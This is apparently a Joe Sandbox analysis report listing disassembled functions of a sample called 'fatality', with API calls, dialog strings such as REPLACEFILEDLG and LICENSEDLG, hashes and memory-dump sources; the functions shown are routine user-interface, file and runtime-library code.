                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            • Associated: 00000001.00000002.1725266921.00000000008E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000925000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000942000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725846207.0000000000952000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000A9C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000AA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000ABC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: fe0d56281cf80372303f5e3642d64b8c16a83fb0bc792a1076ad15cb538c920d
                                                                                                                                                            • Instruction ID: 07717087c2d9ce1e186182a14b87d27ee5e9b339123c4faf82e5d1e905262a7e
                                                                                                                                                            • Opcode Fuzzy Hash: fe0d56281cf80372303f5e3642d64b8c16a83fb0bc792a1076ad15cb538c920d
                                                                                                                                                            • Instruction Fuzzy Hash: 115181B1E246098FEB15CF64D8817AABBF4FF48354F248539DA11EB291D3749940CF60
                                                                                                                                                            Function 008FC220 Relevance: 31.8, APIs: 15, Strings: 3, Instructions: 286windowCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 008E1316: GetDlgItem.USER32(00000000,00003021), ref: 008E135A
                                                                                                                                                              • Part of subcall function 008E1316: SetWindowTextW.USER32(00000000,009135F4), ref: 008E1370
                                                                                                                                                            • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 008FC2B1
                                                                                                                                                            • EndDialog.USER32(?,00000006), ref: 008FC2C4
                                                                                                                                                            • GetDlgItem.USER32(?,0000006C), ref: 008FC2E0
                                                                                                                                                            • SetFocus.USER32(00000000), ref: 008FC2E7
                                                                                                                                                            • SetDlgItemTextW.USER32(?,00000065,?), ref: 008FC321
                                                                                                                                                            • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 008FC358
                                                                                                                                                            • _swprintf.LIBCMT ref: 008FC404
                                                                                                                                                            • SetDlgItemTextW.USER32(?,0000006A,?), ref: 008FC417
                                                                                                                                                            • _swprintf.LIBCMT ref: 008FC477
                                                                                                                                                            • SetDlgItemTextW.USER32(?,00000068,?), ref: 008FC48A
                                                                                                                                                            • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 008FC4A7
                                                                                                                                                            • _swprintf.LIBCMT ref: 008FC535
                                                                                                                                                            • SetDlgItemTextW.USER32(?,0000006B,?), ref: 008FC548
                                                                                                                                                            • _swprintf.LIBCMT ref: 008FC59C
                                                                                                                                                            • SetDlgItemTextW.USER32(?,00000069,?), ref: 008FC5AF
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            • Associated: 00000001.00000002.1725266921.00000000008E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000925000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000942000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725846207.0000000000952000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000A9C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000AA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000ABC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Item$Text$_swprintf$MessageSend$DialogFocusWindow
                                                                                                                                                            • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                                                                                                                                            • API String ID: 1203808948-1840816070
                                                                                                                                                            • Opcode ID: dd898d52cba173029f72a0255f3ce520b8a43e558919c8309edb2df571094366
                                                                                                                                                            • Instruction ID: 9e129c6b3cda38f77cbfe4320de4eb2dc5a19ef3fb762dd9395dc40ba0754920
                                                                                                                                                            • Opcode Fuzzy Hash: dd898d52cba173029f72a0255f3ce520b8a43e558919c8309edb2df571094366
                                                                                                                                                            • Instruction Fuzzy Hash: 41917F7225C34CBBD2219BB4CD49FFB77ACFB8A704F048819B749D6081D675AB049B62
                                                                                                                                                            Function 008EE2E8 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 234COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • _swprintf.LIBCMT ref: 008EE30E
                                                                                                                                                            • _strlen.LIBCMT ref: 008EE32F
                                                                                                                                                            • SetDlgItemTextW.USER32(?,0091E274,?), ref: 008EE38F
                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 008EE3C9
                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 008EE3D5
                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 008EE475
                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 008EE4A2
                                                                                                                                                            • SetWindowTextW.USER32(?,?), ref: 008EE4DB
                                                                                                                                                            • GetSystemMetrics.USER32(00000008), ref: 008EE4E3
                                                                                                                                                            • GetWindow.USER32(?,00000005), ref: 008EE4EE
                                                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 008EE51B
                                                                                                                                                            • GetWindow.USER32(00000000,00000002), ref: 008EE58D
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            • Associated: 00000001.00000002.1725266921.00000000008E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000925000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000942000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725846207.0000000000952000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000A9C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000AA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000ABC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Window$Rect$Text$ClientItemLongMetricsSystem_strlen_swprintf
                                                                                                                                                            • String ID: $%s:$CAPTION$d
                                                                                                                                                            • API String ID: 1208408182-2512411981
                                                                                                                                                            • Opcode ID: 9e326049135437ba88b8828af9878c1ad78060aa0289f73c82e0b610919dd456
                                                                                                                                                            • Instruction ID: b5fe9336424420a3da86f915c3c4e14aaa6e373eb9db4613d325640f174b200a
                                                                                                                                                            • Opcode Fuzzy Hash: 9e326049135437ba88b8828af9878c1ad78060aa0289f73c82e0b610919dd456
                                                                                                                                                            • Instruction Fuzzy Hash: 99819F72208341AFD710DF69CC89E6BBBE9FBCA704F04491DFA84D7291D631E9058B52
                                                                                                                                                            Function 0090CB22 Relevance: 19.6, APIs: 13, Instructions: 114COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • ___free_lconv_mon.LIBCMT ref: 0090CB66
                                                                                                                                                              • Part of subcall function 0090C701: _free.LIBCMT ref: 0090C71E
                                                                                                                                                              • Part of subcall function 0090C701: _free.LIBCMT ref: 0090C730
                                                                                                                                                              • Part of subcall function 0090C701: _free.LIBCMT ref: 0090C742
                                                                                                                                                              • Part of subcall function 0090C701: _free.LIBCMT ref: 0090C754
                                                                                                                                                              • Part of subcall function 0090C701: _free.LIBCMT ref: 0090C766
                                                                                                                                                              • Part of subcall function 0090C701: _free.LIBCMT ref: 0090C778
                                                                                                                                                              • Part of subcall function 0090C701: _free.LIBCMT ref: 0090C78A
                                                                                                                                                              • Part of subcall function 0090C701: _free.LIBCMT ref: 0090C79C
                                                                                                                                                              • Part of subcall function 0090C701: _free.LIBCMT ref: 0090C7AE
                                                                                                                                                              • Part of subcall function 0090C701: _free.LIBCMT ref: 0090C7C0
                                                                                                                                                              • Part of subcall function 0090C701: _free.LIBCMT ref: 0090C7D2
                                                                                                                                                              • Part of subcall function 0090C701: _free.LIBCMT ref: 0090C7E4
                                                                                                                                                              • Part of subcall function 0090C701: _free.LIBCMT ref: 0090C7F6
                                                                                                                                                            • _free.LIBCMT ref: 0090CB5B
                                                                                                                                                              • Part of subcall function 00908DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0090C896,?,00000000,?,00000000,?,0090C8BD,?,00000007,?,?,0090CCBA,?), ref: 00908DE2
                                                                                                                                                            • _free.LIBCMT ref: 0090CB7D
                                                                                                                                                            • _free.LIBCMT ref: 0090CB92
                                                                                                                                                            • _free.LIBCMT ref: 0090CB9D
                                                                                                                                                            • _free.LIBCMT ref: 0090CBBF
                                                                                                                                                            • _free.LIBCMT ref: 0090CBD2
                                                                                                                                                            • _free.LIBCMT ref: 0090CBE0
                                                                                                                                                            • _free.LIBCMT ref: 0090CBEB
                                                                                                                                                            • _free.LIBCMT ref: 0090CC23
                                                                                                                                                            • _free.LIBCMT ref: 0090CC2A
                                                                                                                                                            • _free.LIBCMT ref: 0090CC47
                                                                                                                                                            • _free.LIBCMT ref: 0090CC5F
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            • Associated: 00000001.00000002.1725266921.00000000008E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000925000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000942000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725846207.0000000000952000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000A9C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000AA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000ABC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _free$FreeHeap___free_lconv_mon
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 358854727-0
                                                                                                                                                            • Opcode ID: ec37ae505227b61060dcd4472ddef2b7d38f6641a876cfc952d733aeb6bbf2c9
                                                                                                                                                            • Instruction ID: 91d9b8887fbe2b2ea84bd1b93355e66859d2fcc1a33f2ae885b228edd4bfeb8f
                                                                                                                                                            • Opcode Fuzzy Hash: ec37ae505227b61060dcd4472ddef2b7d38f6641a876cfc952d733aeb6bbf2c9
                                                                                                                                                            • Instruction Fuzzy Hash: 6D313BB16003069FEB21AB78D84AB5BB7E9AF90310F145A29E59DD71D2DF75EC80CB10
                                                                                                                                                            Function 008FD69E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • GetWindow.USER32(?,00000005), ref: 008FD6C1
                                                                                                                                                            • GetClassNameW.USER32(00000000,?,00000800), ref: 008FD6ED
                                                                                                                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 008FD709
                                                                                                                                                            • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 008FD720
                                                                                                                                                            • GetObjectW.GDI32(00000000,00000018,?), ref: 008FD734
                                                                                                                                                            • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 008FD75D
                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 008FD764
                                                                                                                                                            • GetWindow.USER32(00000000,00000002), ref: 008FD76D
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            • Associated: 00000001.00000002.1725266921.00000000008E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000925000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000942000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725846207.0000000000952000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000A9C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000AA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000ABC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Window$MessageObjectSend$ClassDeleteLongName
                                                                                                                                                            • String ID: STATIC
                                                                                                                                                            • API String ID: 2845197485-1882779555
                                                                                                                                                            • Opcode ID: 8197e09ef4d688a01f824bac42aace3215557b6466ddb9b8a3b79f2a3a86e00c
                                                                                                                                                            • Instruction ID: ae4078068fd5226ce8245b24e5f7c416f504feb27f86b76be49381455635ba99
                                                                                                                                                            • Opcode Fuzzy Hash: 8197e09ef4d688a01f824bac42aace3215557b6466ddb9b8a3b79f2a3a86e00c
                                                                                                                                                            • Instruction Fuzzy Hash: 881136762183187BE221BB749C4AFBF775DFF59711F10C220FB01E6091DA64CA0552A2
                                                                                                                                                            Function 009096F1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            • Associated: 00000001.00000002.1725266921.00000000008E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000925000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000942000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725846207.0000000000952000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000A9C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000AA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000ABC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _free$FreeHeap
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2929853658-0
                                                                                                                                                            • Opcode ID: 0774f3f2524db687f91a1278c58bc0a97c4c04b0e27724d153f6104ebb0db768
                                                                                                                                                            • Instruction ID: 121c4f09e783c2abd8314426b14d5bfd67465a234cbc8013d67b334b2b1cf34e
                                                                                                                                                            • Opcode Fuzzy Hash: 0774f3f2524db687f91a1278c58bc0a97c4c04b0e27724d153f6104ebb0db768
                                                                                                                                                            • Instruction Fuzzy Hash: 7911D47622010AAFCB01EF54C846EDA3BB5EF54350F0156A0FA488F2E2DE32DA509B84
                                                                                                                                                            Function 008FB5C0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 008E1316: GetDlgItem.USER32(00000000,00003021), ref: 008E135A
                                                                                                                                                              • Part of subcall function 008E1316: SetWindowTextW.USER32(00000000,009135F4), ref: 008E1370
                                                                                                                                                            • EndDialog.USER32(?,00000001), ref: 008FB610
                                                                                                                                                            • SendMessageW.USER32(?,00000080,00000001,?), ref: 008FB637
                                                                                                                                                            • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 008FB650
                                                                                                                                                            • SetWindowTextW.USER32(?,?), ref: 008FB661
                                                                                                                                                            • GetDlgItem.USER32(?,00000065), ref: 008FB66A
                                                                                                                                                            • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 008FB67E
                                                                                                                                                            • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 008FB694
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            • Associated: 00000001.00000002.1725266921.00000000008E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000925000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000942000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725846207.0000000000952000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000A9C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000AA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000ABC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: MessageSend$Item$TextWindow$Dialog
                                                                                                                                                            • String ID: LICENSEDLG
                                                                                                                                                            • API String ID: 3214253823-2177901306
                                                                                                                                                            • Opcode ID: a7fe7eceea73e3895d92a1076adbc5e442ac4764e4ff21d0c328ef984f1c7edf
                                                                                                                                                            • Instruction ID: a45e415fd2cdb4c7e687c822a7cdfc9600ed925dea558b4514d104e5a9f7f77d
                                                                                                                                                            • Opcode Fuzzy Hash: a7fe7eceea73e3895d92a1076adbc5e442ac4764e4ff21d0c328ef984f1c7edf
                                                                                                                                                            • Instruction Fuzzy Hash: 5421D33266C20CBBD2115B76EC49F3B3B6DFB5BB85F018014F740D60A0CB569901AA31
                                                                                                                                                            Function 008E6FA5 Relevance: 12.6, APIs: 3, Strings: 4, Instructions: 329COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog.LIBCMT ref: 008E6FAA
                                                                                                                                                            • _wcslen.LIBCMT ref: 008E7013
                                                                                                                                                            • _wcslen.LIBCMT ref: 008E7084
                                                                                                                                                              • Part of subcall function 008EA1E0: DeleteFileW.KERNELBASE(000000FF,?,?,008E977F,?,?,008E95CF,00000000,00912641,000000FF), ref: 008EA1F1
                                                                                                                                                              • Part of subcall function 008E9DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 008E9E70
                                                                                                                                                              • Part of subcall function 008E9620: CloseHandle.KERNELBASE(000000FF,?,?,008E95D6,00000000,00912641,000000FF), ref: 008E963B
                                                                                                                                                              • Part of subcall function 008EA4ED: SetFileAttributesW.KERNELBASE(00000001,00000000,00000001,?,008EA325,00000001,008E70E6,?,008EA175,?,00000001,00000000,?,?), ref: 008EA501
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            • Associated: 00000001.00000002.1725266921.00000000008E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000925000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000942000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725846207.0000000000952000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000A9C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000AA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000ABC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: File$_wcslen$AttributesCloseDeleteH_prologHandleTime
                                                                                                                                                            • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                                                                                            • API String ID: 449284102-3508440684
                                                                                                                                                            • Opcode ID: 2e5e4e5a3ffdf945389d5d97d496f6bfe7efa212279487398e99b19ea19a9aef
                                                                                                                                                            • Instruction ID: 80d59c4cebb5bf04642463a5a129878f27dc379a908c39ec9f413e713898371b
                                                                                                                                                            • Opcode Fuzzy Hash: 2e5e4e5a3ffdf945389d5d97d496f6bfe7efa212279487398e99b19ea19a9aef
                                                                                                                                                            • Instruction Fuzzy Hash: 2EC1E671A04688AEDB25DB75DC41FEEB7B8FF16300F004559FA56E3282D770AA44CB62
                                                                                                                                                            Function 00902E31 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • type_info::operator==.LIBVCRUNTIME ref: 00902F50
                                                                                                                                                            • ___TypeMatch.LIBVCRUNTIME ref: 0090305E
                                                                                                                                                            • _UnwindNestedFrames.LIBCMT ref: 009031B0
                                                                                                                                                            • CallUnexpected.LIBVCRUNTIME ref: 009031CB
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            • Associated: 00000001.00000002.1725266921.00000000008E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000925000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000942000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725846207.0000000000952000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000A9C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000AA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000ABC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                                                                            • String ID: csm$csm$csm
                                                                                                                                                            • API String ID: 2751267872-393685449
